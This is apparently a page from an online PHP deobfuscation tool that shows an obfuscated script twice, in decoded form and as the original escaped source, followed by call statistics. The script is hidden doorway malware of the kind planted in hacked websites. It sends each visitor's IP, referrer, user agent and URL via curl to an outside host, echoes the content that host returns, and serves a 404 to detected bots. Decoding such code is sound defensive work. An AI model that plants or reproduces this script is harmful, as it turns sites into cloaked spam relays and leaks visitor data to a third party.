Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $x27="\x63o\165\156\x74"; $x28="c\x75\x72\x6c_\151\x6e\x69t"; $x29="\x63\x75\x72\..
Decoded Output download
<?php
$x27="count"; $x28="curl_init"; $x29="curl_setopt"; $x2a="curl_exec"; $x2b="curl_error"; $x2c="curl_close"; $x2d="explode"; $x2e="header"; $x2f="implode"; $x30="ini_set"; $x31="is_array"; $x32="preg_match"; $x33="str_ireplace"; $x34="stripos"; $x35="strpos"; $x36="trim";
$x30('display_errors', "Off"); $x0b="";$x0c="q"; $x0d="http://virginfarmalines.org/c7/result_doorway/tobiasmuehlbauer.php"; $x0e=$x2d("/", $x0d);$x0f=$x27($x0e);unset($x0e[$x0f-1]);$x0e=$x2f("/", $x0e);$x10="";$x10=$x2d("/",$x10);$x0f=$x27($x10);if(empty($x10[$x0f-1])){ unset($x10[$x0f-1]);}$x10=$x2f("/", $x10);$x11="";$x12="";if(!empty($_SERVER['HTTP_REFERER'])){$x13=$_SERVER['HTTP_REFERER'];}else{$x13="";}if(!empty($_SERVER['HTTP_USER_AGENT'])){$x14=$_SERVER['HTTP_USER_AGENT'];}else{$x14="";}if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$x15=$_SERVER['HTTP_X_FORWARDED_FOR'];}elseif(!empty($_SERVER['REMOTE_ADDR'])){$x15=$_SERVER['REMOTE_ADDR'];}else{$x15="";}if(!empty($x10)){$x16=$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];$x16=$x2d("/", $x16);$x0f=$x27($x16);if(empty($x16[$x0f-1])){ unset($x16[$x0f-1]);}$x16=$x2f("/", $x16)."qqqqq";$x17=$x33("[KEYLINKVIEW]", "([^/]*)", $x10);$x17=$x17."qqqqq";$x17=$x33("[SITE]", "([^\s]+)", $x17);$x17=$x33("?", "\?", $x17);$x17=$x33("/", "\/", $x17);$x17="/".$x17."/iU";$x32($x17, $x16, $x18);if($x18[2]){ $x12=$x36($x18[2]);}else{$x11="test";}}$x19="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];if($x35("qqq ".$x19, "?com=botdetected")){ $x1a=x0b($x0d, "", "botdetected" ,$x15, "", "", "", ""); $x2e('HTTP/1.1 404 Not Found'); $x2e('Status: 404 Not Found'); echo $x1a; exit();}$x1b=$x19;$x19=$x33("http://", "", $x19);if(!$x35($x19, "?".$x0c."=")){$x1c=$x2d("/", $x19);$x0f=$x27($x1c);if(empty($x1c[$x0f-1])){ unset($x1c[$x0f-1]); unset($x1c[$x0f-2]);}else{ unset($x1c[$x0f-1]);}$x1c=$x2f("/", $x1c); }else{$x1d=$x2d("?".$x0c."=", $x19);if($x31($x1d)) { $x19 = $x1d[0]; $x1c=$x36($x1d[0]);}}if(empty($x12)){if(!empty($_GET[$x0c])){$x12=$x36($_GET[$x0c]);}}if(!empty($_GET['com'])){$x1e=$x36($_GET['com']);}else{$x1e="";}$x1f="good"; if(!empty($x0b)){$x0b=$x2d(",", $x0b);foreach($x0b as $x20){ $x20=$x36($x20); if($x34("qqq".$x12, $x20)){$x1f="good";break; }else{$x1f=""; }} }if(!empty($x1f) && empty($x11) && !empty($x10)){$x1a=x0b($x0d, $x12, $x1e ,$x15, $x36($x1c), $x1b, $x13, $x14);if(!empty($x1a)){ echo $x1a;die();}}elseif(!empty($x1f) && empty($x10)){$x1a=x0b($x0d, $x12, $x1e ,$x15, $x36($x1c), $x1b, $x13, $x14);echo $x1a;die();} function x0b($x0d, $x21, $x22 ,$x15, $x23, $x1b, $x13, $x14){ global $x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36; global $x0c;global $x0e;if(!empty($x22)){$x22="&com=".$x22;}else{$x22="";}if(!empty($x15)){$x15="&ip=".$x15;}else{$x15="";}if(!empty($x23)){$x23="&cachedir=".$x23;}else{$x23="";}$x1b="&clurl=".$x36($x1b);$x24="?q=";$x25=$x0d."".$x24."".$x21."".$x22."".$x15."".$x23."".$x1b."&clientqname=".$x0c; $x26 = $x28(); $x29($x26, CURLOPT_URL, $x25);$x29($x26, CURLOPT_HEADER, false);$x29($x26, CURLOPT_RETURNTRANSFER, true);$x29($x26, CURLOPT_CONNECTTIMEOUT, 10);$x29($x26, CURLOPT_USERAGENT, $x14);$x29($x26, CURLOPT_REFERER, $x13);$x1a = $x2a($x26);echo $x2b($x26); $x2c($x26);$x1a=$x33($x24, "?".$x0c."=", $x1a);$x1a=$x33("./images", $x0e."/images", $x1a);return $x1a; } ?>Did this file decode correctly?
Original Code
<?php
$x27="\x63o\165\156\x74"; $x28="c\x75\x72\x6c_\151\x6e\x69t"; $x29="\x63\x75\x72\x6c\x5f\163\x65\x74\157\160\164"; $x2a="c\x75r\x6c_\145\170e\x63"; $x2b="\x63\x75\162\x6c_\145r\x72\x6f\162"; $x2c="\x63\x75\x72l\x5f\143l\x6fs\x65"; $x2d="ex\160l\x6fde"; $x2e="\x68\x65a\x64er"; $x2f="\151m\160\x6c\x6fd\145"; $x30="\x69\156\x69\x5fs\x65\x74"; $x31="\151\163_\141\x72r\141y"; $x32="\160reg\x5f\155\141\164\x63\x68"; $x33="st\x72_i\162e\x70l\x61\x63\145"; $x34="s\x74\162\x69p\157s"; $x35="\163\164\x72pos"; $x36="\164\x72i\155";
$x30('display_errors', "\117\x66\x66"); $x0b="";$x0c="q"; $x0d="\x68\164t\160:\057\x2fv\151\x72\x67\x69\x6e\x66\141\162malin\x65\163.\x6f\162g/c\x37\057\x72e\x73\165\x6c\x74\x5f\144\x6f\x6f\162\167ay\x2f\164\157\x62\151\x61s\155\x75\x65h\154ba\165\x65\x72\056p\x68p"; $x0e=$x2d("\x2f", $x0d);$x0f=$x27($x0e);unset($x0e[$x0f-1]);$x0e=$x2f("\057", $x0e);$x10="";$x10=$x2d("/",$x10);$x0f=$x27($x10);if(empty($x10[$x0f-1])){ unset($x10[$x0f-1]);}$x10=$x2f("\x2f", $x10);$x11="";$x12="";if(!empty($_SERVER['HTTP_REFERER'])){$x13=$_SERVER['HTTP_REFERER'];}else{$x13="";}if(!empty($_SERVER['HTTP_USER_AGENT'])){$x14=$_SERVER['HTTP_USER_AGENT'];}else{$x14="";}if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$x15=$_SERVER['HTTP_X_FORWARDED_FOR'];}elseif(!empty($_SERVER['REMOTE_ADDR'])){$x15=$_SERVER['REMOTE_ADDR'];}else{$x15="";}if(!empty($x10)){$x16=$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];$x16=$x2d("/", $x16);$x0f=$x27($x16);if(empty($x16[$x0f-1])){ unset($x16[$x0f-1]);}$x16=$x2f("\x2f", $x16)."qq\x71\x71\161";$x17=$x33("[\113\105Y\x4c\111NKVIEW\x5d", "\050[\136\057\135*)", $x10);$x17=$x17."\x71\161q\x71q";$x17=$x33("\133S\x49\x54E\x5d", "\050[\x5e\s]+\051", $x17);$x17=$x33("\x3f", "\?", $x17);$x17=$x33("/", "\/", $x17);$x17="\057".$x17."\057\151\125";$x32($x17, $x16, $x18);if($x18[2]){ $x12=$x36($x18[2]);}else{$x11="\x74e\x73t";}}$x19="\x68\x74t\160:\057\057".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];if($x35("qqq\040".$x19, "?\143\157m\075\142o\164d\145\x74\145c\164ed")){ $x1a=x0b($x0d, "", "b\x6ft\x64\145\x74\x65\143\x74\145\144" ,$x15, "", "", "", ""); $x2e('HTTP/1.1 404 Not Found'); $x2e('Status: 404 Not Found'); echo $x1a; exit();}$x1b=$x19;$x19=$x33("\x68\164\164p:\x2f\x2f", "", $x19);if(!$x35($x19, "\077".$x0c."\075")){$x1c=$x2d("\057", $x19);$x0f=$x27($x1c);if(empty($x1c[$x0f-1])){ unset($x1c[$x0f-1]); unset($x1c[$x0f-2]);}else{ unset($x1c[$x0f-1]);}$x1c=$x2f("/", $x1c); }else{$x1d=$x2d("\077".$x0c."\075", $x19);if($x31($x1d)) { $x19 = $x1d[0]; $x1c=$x36($x1d[0]);}}if(empty($x12)){if(!empty($_GET[$x0c])){$x12=$x36($_GET[$x0c]);}}if(!empty($_GET['com'])){$x1e=$x36($_GET['com']);}else{$x1e="";}$x1f="\147\x6f\x6f\x64"; if(!empty($x0b)){$x0b=$x2d("\x2c", $x0b);foreach($x0b as $x20){ $x20=$x36($x20); if($x34("\161\x71q".$x12, $x20)){$x1f="\x67\x6fo\x64";break; }else{$x1f=""; }} }if(!empty($x1f) && empty($x11) && !empty($x10)){$x1a=x0b($x0d, $x12, $x1e ,$x15, $x36($x1c), $x1b, $x13, $x14);if(!empty($x1a)){ echo $x1a;die();}}elseif(!empty($x1f) && empty($x10)){$x1a=x0b($x0d, $x12, $x1e ,$x15, $x36($x1c), $x1b, $x13, $x14);echo $x1a;die();} function x0b($x0d, $x21, $x22 ,$x15, $x23, $x1b, $x13, $x14){ global $x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36; global $x0c;global $x0e;if(!empty($x22)){$x22="\046\x63o\x6d\075".$x22;}else{$x22="";}if(!empty($x15)){$x15="\046\x69p=".$x15;}else{$x15="";}if(!empty($x23)){$x23="&\x63a\x63h\x65dir\x3d".$x23;}else{$x23="";}$x1b="\046\x63\154\165\162\154\075".$x36($x1b);$x24="\077\x71\075";$x25=$x0d."".$x24."".$x21."".$x22."".$x15."".$x23."".$x1b."\x26\143l\x69\x65n\164\x71\156a\x6de=".$x0c; $x26 = $x28(); $x29($x26, CURLOPT_URL, $x25);$x29($x26, CURLOPT_HEADER, false);$x29($x26, CURLOPT_RETURNTRANSFER, true);$x29($x26, CURLOPT_CONNECTTIMEOUT, 10);$x29($x26, CURLOPT_USERAGENT, $x14);$x29($x26, CURLOPT_REFERER, $x13);$x1a = $x2a($x26);echo $x2b($x26); $x2c($x26);$x1a=$x33($x24, "?".$x0c."\075", $x1a);$x1a=$x33("\056\x2fi\x6da\147\145\163", $x0e."\x2fi\155\x61\147\x65\163", $x1a);return $x1a; } ?>Function Calls
| count | 1 |
| explode | 1 |
| ini_set | 1 |
Stats
| MD5 | bb1e00df68b0212c7cb99227a0345620 |
| Eval Count | 0 |
| Decode Time | 109 ms |